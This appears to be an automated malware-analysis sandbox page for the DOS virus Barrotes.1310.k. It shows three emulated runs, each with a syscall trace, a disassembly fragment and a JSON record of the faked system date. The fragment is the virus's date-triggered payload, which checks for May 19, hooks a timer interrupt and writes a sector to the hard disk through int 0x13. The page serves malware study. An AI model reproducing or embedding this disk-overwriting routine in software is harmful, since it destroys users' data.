Sample viewer

vx.netlux.org/Virus.DOS.Barrotes.1310.k

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:30.572426237Z 238 PC: 13252 | UNKNOWN!
2018-12-17T22:25:30.573834009Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:25:30.575447059Z 54 PC: 9f771 | Get free disk space
2018-12-17T22:25:30.585309872Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:30.586666564Z 67 PC: 9f7be | Get or set file attributes
2018-12-17T22:25:30.593236548Z 67 PC: 9f7ca | Get or set file attributes
2018-12-17T22:25:30.599348664Z 67 PC: 9fa0b | Get or set file attributes
2018-12-17T22:25:30.604481715Z 42 PC: 132ec | Get date 0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4507,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:55.006777952Z 238 PC: 13252 | UNKNOWN!
2018-12-25T11:51:55.009061346Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:55.010455738Z 54 PC: 9f771 | Get free disk space
2018-12-25T11:51:55.027485004Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:55.029082744Z 67 PC: 9f7be | Get or set file attributes
2018-12-25T11:51:55.03466572Z 67 PC: 9f7ca | Get or set file attributes
2018-12-25T11:51:55.039995311Z 67 PC: 9fa0b | Get or set file attributes
2018-12-25T11:51:55.045024676Z 42 PC: 132ec | Get date 0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di

{"DateBased":true,"Day":19,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4507,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:55.054124261Z 238 PC: 13252 | UNKNOWN!
2018-12-25T11:51:55.054788777Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:55.056742666Z 54 PC: 9f771 | Get free disk space
2018-12-25T11:51:55.066761694Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:55.068229907Z 67 PC: 9f7be | Get or set file attributes
2018-12-25T11:51:55.08411065Z 67 PC: 9f7ca | Get or set file attributes
2018-12-25T11:51:55.097626796Z 67 PC: 9fa0b | Get or set file attributes
2018-12-25T11:51:55.103337224Z 42 PC: 132ec | Get date 0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di